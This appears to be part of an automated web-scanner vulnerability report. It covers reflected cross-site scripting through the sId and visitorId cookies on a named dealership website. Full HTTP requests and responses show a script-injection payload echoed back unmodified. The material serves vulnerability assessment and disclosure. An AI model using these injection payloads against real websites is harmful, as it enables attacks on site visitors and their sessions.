Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /siteMap HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw276b4'><script>alert(1)</script>322ead584dd;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:40 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=CG8LM13Lt0y2JyGrlHxLWq59vm2jRyyBBlycxgp2TdLcztYp2rnk!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Friday, 07-Dec-2012 07:44:40 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw276b4'><script>alert(1)</script>322ead584dd; expires=Wednesday, 08-Dec-2010 08:14:40 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->
The value of the visitorId cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 51225'><script>alert(1)</script>4c69b6fe928 was submitted in the visitorId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /siteMap HTTP/1.1 Host: www.sunnyvalevw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw!-1618160423; visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw51225'><script>alert(1)</script>4c69b6fe928; sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw;
Response
HTTP/1.0 200 OK Cache-Control: no-store,no-cache="Set-Cookie" Date: Wed, 08 Dec 2010 07:44:21 GMT Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=fy7kM13V9rMBpF6CvdkJHDv0cXCV6vGKkSDPTp7K8FwKfJ5mPy7W!-1618160423; path=/ Set-Cookie: visitorId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw51225'><script>alert(1)</script>4c69b6fe928; expires=Friday, 07-Dec-2012 07:44:21 GMT Set-Cookie: sId=t4nBM27N7rLvnFt0YPRST3krsQLr3J2fl9QJbvch8m2w9VwCJYdw; expires=Wednesday, 08-Dec-2010 08:14:21 GMT Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 X-Cache: MISS from backend01-1 X-Cache-Lookup: MISS from backend01-1:4001 X-Cache: MISS from frontend01 X-Cache-Lookup: MISS from frontend01:3128 Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid) Proxy-Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->